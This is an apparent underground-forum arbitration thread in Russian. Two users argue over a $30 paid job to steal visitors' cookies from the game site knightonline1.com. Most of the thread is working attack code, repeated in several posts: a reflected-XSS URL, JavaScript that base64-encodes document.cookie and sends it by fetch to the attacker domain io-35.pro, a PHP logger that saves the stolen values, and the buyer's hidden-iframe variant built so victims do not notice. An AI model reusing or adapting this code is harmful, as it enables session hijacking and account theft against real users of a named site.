Арбитраж AzurePhoenix

[trex]

AzurePhoenix
Я хотел бы сообщить об одном человеке как о мошеннике. Мы только что заключили сделку, и я уже отправил ему деньги. Он просто отправил мне что-то из Google, но не выполнил свою часть сделки, как мы обсуждали в начале. Я хочу, чтобы администратор xss.pro проверил историю нашего чата, которую я также отправил администраторам через Telegram, чтобы предоставить доказательства. Я бы хотел, чтобы администратор наказал его.

 

[AzurePhoenix]

Итак, что он запросил:

Спойлер

Что я ему дал:

Это вставим в XSS

var cookies = document.cookie;
console.log(cookies);
var encodedCookies = btoa(cookies);
console.log(encodedCookies);
document.getElementById("navbarDropdown").innerHTML='<img src=https://тут_домен_ком/?get=" '+encodedCookies+'"></img>';

Так будем принимать куки и записывать в файл

<?php
// Устанавливаем заголовки для разрешения кросс-доменного доступа (CORS)
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
header("Access-Control-Allow-Headers: Content-Type, Authorization");

// Получаем IP-адрес посетителя
$ip = $_SERVER['REMOTE_ADDR'];

// Получаем текущую дату и время
$date = date('Y-m-d H:i:s');

// Получаем все GET параметры
$query_string = $_SERVER['QUERY_STRING'];

// Формируем строку для записи в лог
$log_entry = "[$date] IP: $ip - Query: $query_string" . PHP_EOL;

// Записываем в log.txt
file_put_contents('log.txt', $log_entry, FILE_APPEND);

// Ответ (можно изменить по своему усмотрению)
echo "Запрос записан.";

//base64_decode($encoded_string);
?>

Так как куки у нас отправляются закодированными, нужно их раскодировать из base64
Например на base64decode org

Чтобы перейдя к нему на сайт (на его сайт), укрались куки с другого сайта
Можно сделать просто редирект на страничку сайта с XSS и обратный редирект к нему с уже исполненной XSS (когда куки укрались)
--------------
Меня отвлекли, немного сбился и не то отправил ему.
Не дает ничего объяснить, не дает прислать ему рабочий код, кричит в личке
--------------
Никуда не пропадаю, все будет

 

[grozdniyandy]

AzurePhoenix лучше домен убрать из скриншота
trex Через рефлектед хсс без коротких ссылок или без stored CSRF ты вряд ли чего то добъёшься

 

[AzurePhoenix]

AzurePhoenix лучше домен убрать из скриншота
trex Через рефлектед хсс без коротких ссылок или без stored CSRF ты вряд ли чего то добъёшься

Он выложил его открыто в другой теме
Сейчас я ему сделаю

Можно сделать просто редирект на страничку сайта с XSS и обратный редирект к нему с уже исполненной XSS (когда куки укрались)

Либо открыть в новой вкладке ссылку с XSS
---------

Нужно заменить везде домен io-35.pro на свой
Размещаем 111.js на хостинге

            function sendGetRequest(){
                var cookies = document.cookie;
console.log(cookies);
var encodedCookies = btoa(cookies);
console.log(encodedCookies);
            var url = `https://io-35.pro/index111.php?get=${encodeURIComponent(encodedCookies)}`;
            fetch(url)
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Network response was not ok');
                    }
                    return response.text();
                })
                .then(data => {
                    console.log(data); // Обработка данных ответа
                })
                .catch(error => {
                    console.error('There was a problem with the fetch operation:', error);
                });
            }
            
        window.onload = function() {
            sendGetRequest();
        }

Размещаем index111.php который записывает запросы в файл

<?php

// Устанавливаем заголовки для разрешения кросс-доменного доступа (CORS)

header("Access-Control-Allow-Origin: *");

header("Access-Control-Allow-Methods: GET, POST, OPTIONS");

header("Access-Control-Allow-Headers: Content-Type, Authorization");

// Получаем все GET параметры

$query_string = $_SERVER['QUERY_STRING'];


// Формируем строку для записи в лог

$log_entry = "Query: $query_string" . PHP_EOL;


// Записываем в log.txt

file_put_contents('log.txt', $log_entry, FILE_APPEND);


// Ответ (можно изменить по своему усмотрению)

echo "Запрос записан.";


//base64_decode($encoded_string);

?>

index.html размещаем на хостинге и открываем, потом жмем кнопку "Записать куки" и кнопку "Посмотреть log.txt"

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Берем куки с другого сайта и записываем в файл!</title>
</head>
<body>
<center>
 <div>
    Если нажать на кнопку, мы возьмем куки с сайта
    <br>knightonline1 com
    <br>
    И запишим их в файл
</div>

<button onclick="openInNewTab('https://knightonline1.com/?utoal=%22%3E%3Cscript%20src=%22https:%2F%2Fio-35.pro%2F111.js%22%3E%3C/script%3E');" style="margin-top:10px;">
    Записать куки в файл log.txt
</button>
<br>
<a href="/log.txt">
<button style="margin-top:10px;">
    Посмотреть log.txt
</button>
</a>
</center>
</body>

<script>
function openInNewTab(url) {
            window.open(url, '_blank');
}
</script>
</html>

И создаем файл log.txt куда логи будут записываться
Записанные запросы берем и расшифровываем через base64 decode и получаем куки

1. Кто-то посещает index.html (io-35.pro)
2. Жмет кнопку или ссылку "Записать куки с сайта knightonline1 com в файл log.txt"
3. Происходит открытие в новой вкладке сайта с XSS
4. Крадутся куки и записываются в файл log.txt
5. Можно на сайте io-35.pro (или на вашем), нажать "Посмотреть log.txt" и посмотреть там закодированные куки в base64
6. Раскодируем base64 и получаем куки от сайта knightonline1 com

Сравниваем с его запросом:

Пример: Когда кто-то посещает мой сайт, я хочу сохранять файлы cookie с сайта knightonline1 на своем сервере, например, в файле log.txt.
Он показывает мне файлы cookie. Как мне настроить PHP-файл на моем сервере, чтобы PHP получал куки посетителя, когда он нажимает на ссылку? Может ли кто-нибудь помочь мне с этим?
Я слышал, что это можно сделать с помощью iframe, но я не знаю, как это реализовать. Любая помощь будет очень признательна.

 

[unruly007]

Либо открыть в новой вкладке ссылку с XSS
---------

Нужно заменить везде домен io-35.pro на свой
Размещаем 111.js на хостинге

            function sendGetRequest(){
                var cookies = document.cookie;
console.log(cookies);
var encodedCookies = btoa(cookies);
console.log(encodedCookies);
            var url = `https://io-35.pro/index111.php?get=${encodeURIComponent(encodedCookies)}`;
            fetch(url)
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Network response was not ok');
                    }
                    return response.text();
                })
                .then(data => {
                    console.log(data); // Обработка данных ответа
                })
                .catch(error => {
                    console.error('There was a problem with the fetch operation:', error);
                });
            }
           
        window.onload = function() {
            sendGetRequest();
        }

Размещаем index111.php который записывает запросы в файл

<?php

// Устанавливаем заголовки для разрешения кросс-доменного доступа (CORS)

header("Access-Control-Allow-Origin: *");

header("Access-Control-Allow-Methods: GET, POST, OPTIONS");

header("Access-Control-Allow-Headers: Content-Type, Authorization");

// Получаем все GET параметры

$query_string = $_SERVER['QUERY_STRING'];


// Формируем строку для записи в лог

$log_entry = "Query: $query_string" . PHP_EOL;


// Записываем в log.txt

file_put_contents('log.txt', $log_entry, FILE_APPEND);


// Ответ (можно изменить по своему усмотрению)

echo "Запрос записан.";


//base64_decode($encoded_string);

?>

index.html размещаем на хостинге и открываем, потом жмем кнопку "Записать куки" и кнопку "Посмотреть log.txt"

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Берем куки с другого сайта и записываем в файл!</title>
</head>
<body>
<center>
 <div>
    Если нажать на кнопку, мы возьмем куки с сайта
    <br>knightonline1 com
    <br>
    И запишим их в файл
</div>

<button onclick="openInNewTab('https://knightonline1.com/?utoal=%22%3E%3Cscript%20src=%22https:%2F%2Fio-35.pro%2F111.js%22%3E%3C/script%3E');" style="margin-top:10px;">
    Записать куки в файл log.txt
</button>
<br>
<a href="/log.txt">
<button style="margin-top:10px;">
    Посмотреть log.txt
</button>
</a>
</center>
</body>

<script>
function openInNewTab(url) {
            window.open(url, '_blank');
}
</script>
</html>

И создаем файл log.txt куда логи будут записываться
Записанные запросы берем и расшифровываем через base64 decode и получаем куки

is this a joke ? lol y'all will learn, they will keep ripping you guys cause you won't want to give the job to the. right person

 

[AzurePhoenix]

Ифреймы не нужны тут, все и так работает как он описал без ифреймов

is this a joke ? lol y'all will learn, they will keep ripping you guys cause you won't want to give the job to the. right person

Перелогинься обратно

 

[unruly007]

Ифреймы не нужны тут, все и так работает как он описал без ифреймов

Перелогинься обратно

how much were you paid ?

 

[AzurePhoenix]

how much were you paid ?

Ты явно не читал ни код, ни задачу которую он поставил
Все работает как он запросил

Цена 30$

 

[trex]

RU:
Я попросил вас составить мой сценарий в том виде, в каком я вам его написал. Когда я смотрю на то, что вы мне дали, это совершенно другая история. IP-адрес журнала, что это такое? Я даже не просил об этом. Посмотрите на мой скрипт и сравните его с вашим. Это далеко не та работа, которую вы должны делать для меня.

Я попросил вас настроить мой скрипт таким образом, чтобы он выполнялся в фоновом режиме IFRAME и не перенаправлялся. Например, когда клиент открывает URL, должно отображаться изображение, а XSS-скрипт должен выполняться в фоновом режиме IFRAME, не замечая клиента. Это был мой заказ. Пожалуйста, проверьте мой оригинальный скрипт и сравните его с вашим. Ваша версия сильно отличается от моих требований.


EN:
What I asked you to do was to put together my script as I wrote it to you. When I look at what you've given me, it's a completely different story. Log IP address, what is that? I didn't even ask for that. Look at my script and compare it to your script. This is far from the work you should be doing for me.

I asked you to customize my script so that it runs in the background IFRAME and is not redirected. For example, when the customer opens the URL, an image should be displayed and the XSS script should be executed in the IFRAME background without the customer noticing. That was my order. Please check my original script and compare it with your script. Your version differs greatly from my requirements.

<?php
header('Content-type: text/html');
header('Access-Control-Allow-Origin: *');

if (isset($_GET['action']) && isset($_GET['new_cookies'])) {
    $action = $_GET['action'];

    if ($action === 'add_cookies') {
        if (empty($_GET['new_cookies'])) {
            exit;
        }
       
        $new_cookies = json_decode($_GET['new_cookies'], true);
       
        if (!empty($new_cookies)) {
            $cookies = file_get_contents('cookies.txt');
       
            if ($cookies === false) {
                $cookies = array();
            } else {
                $cookies = json_decode($cookies, true);
               
                if (!is_array($cookies)) {
                    $cookies = array();
                }
            }
           
            array_push($cookies, $new_cookies);
            file_put_contents('cookies.txt', json_encode($cookies, JSON_PRETTY_PRINT));
        }
       
        exit;
    }
}

?>


<!DOCTYPE html>
<html>
    <head>
        <style>
            body {
                position: relative;
                margin: 0;
                background-color: darkgrey;
                background-color: #212121;
                background-image: url("chrome://global/skin/media/imagedoc-darknoise.png");
            }
           
            html, body, #img-container {
                width: 100%;
                height: 100%;
            }
           
            #img-container {
                display: flex;
            }
           
            #img {
                display: block;
                max-width: 100%;
                max-height: 100%;
                height: auto;
                margin: auto;
            }
           
            iframe {
                /* display: none; */
            }
        </style>
    </head>
    <body>
        <div id="img-container">
            <img id="img" src="https://img.freepik.com/fotos-premium/portraet-eines-coolen-affen-als-hacker-mit-generativer-ki_861549-2925.jpg" />
        </div>
       
        <script>
            // -- Target --
            const sendCookiesFn =  `(${(function () {
                const getCookies = () => document.cookie.length > 0 ? Object.fromEntries(document.cookie.split('; ').map(x => x.split('=', 2))) : {};
                const cookies = getCookies();
               
                fetch(`{{location_href}}?action=add_cookies&new_cookies=${encodeURIComponent(JSON.stringify(cookies))}`);
            }).toString().replace('{{location_href}}', location.href).replace(/\n/g, '')})()`;
            // -- /Target --
        </script>
       
        <script>
            // -> XSS URL: https://knightonline1.com/?utoal=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
           
            const iframe = document.createElement('iframe');
            document.documentElement.appendChild(iframe);
            //const iframe = document.getElementsByTagName('iframe')[0];
           
            const form = document.createElement('form');
            form.action = 'https://knightonline1.com/?utoal=">';
            form.method = 'POST';
           
            console.log(sendCookiesFn);
           
            const data = {
                2: '" style="animation:example 2s infinite linear" onanimationstart="' + sendCookiesFn + '"><style>@keyframes example {from {background-color: red;}to {background-color: yellow;}}</style>',
                module: 'main',
                action: 'highscore'
            };
           
            Object.entries(data).forEach(([name, value]) => {
                const input = document.createElement('input');
                form.appendChild(input);
            });
           
            iframe.contentDocument.documentElement.appendChild(form);
            form.submit();
        </script>
    </body>
</html>

 

[trex]

Итак, что он запросил:

Спойлер

Посмотреть вложение 88043

Что я ему дал:

Это вставим в XSS

var cookies = document.cookie;
console.log(cookies);
var encodedCookies = btoa(cookies);
console.log(encodedCookies);
document.getElementById("navbarDropdown").innerHTML='<img src=https://тут_домен_ком/?get=" '+encodedCookies+'"></img>';

Так будем принимать куки и записывать в файл

<?php
// Устанавливаем заголовки для разрешения кросс-доменного доступа (CORS)
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
header("Access-Control-Allow-Headers: Content-Type, Authorization");

// Получаем IP-адрес посетителя
$ip = $_SERVER['REMOTE_ADDR'];

// Получаем текущую дату и время
$date = date('Y-m-d H:i:s');

// Получаем все GET параметры
$query_string = $_SERVER['QUERY_STRING'];

// Формируем строку для записи в лог
$log_entry = "[$date] IP: $ip - Query: $query_string" . PHP_EOL;

// Записываем в log.txt
file_put_contents('log.txt', $log_entry, FILE_APPEND);

// Ответ (можно изменить по своему усмотрению)
echo "Запрос записан.";

//base64_decode($encoded_string);
?>

Так как куки у нас отправляются закодированными, нужно их раскодировать из base64
Например на base64decode org

Чтобы перейдя к нему на сайт (на его сайт), укрались куки с другого сайта
Можно сделать просто редирект на страничку сайта с XSS и обратный редирект к нему с уже исполненной XSS (когда куки укрались)
--------------
Меня отвлекли, немного сбился и не то отправил ему.
Не дает ничего объяснить, не дает прислать ему рабочий код, кричит в личке
--------------
Никуда не пропадаю, все будет

https://api.img.fo/img/JCxfmlxZp1.png

Вот исправленный текст, основанный на вашей просьбе:

Я попросил вас настроить мой скрипт таким образом, чтобы он выполнялся в фоновом режиме и не перенаправлялся. Например, изображение должно отображаться, когда клиент открывает URL, а XSS-скрипт должен выполняться в фоновом режиме так, чтобы клиент этого не заметил. Таково было мое краткое описание.

Ваш скрипт сильно отличается от моих требований. Пожалуйста, проверьте мой оригинальный скрипт и адаптируйте его в соответствии с тем, что мы обсуждали.

 

[admin]

Правила оформления арбитражей - https://xss.pro/threads/34768/ Данная тема оформлена не по правилам, да и факта кидка я не вижу. Отказано, закрыто.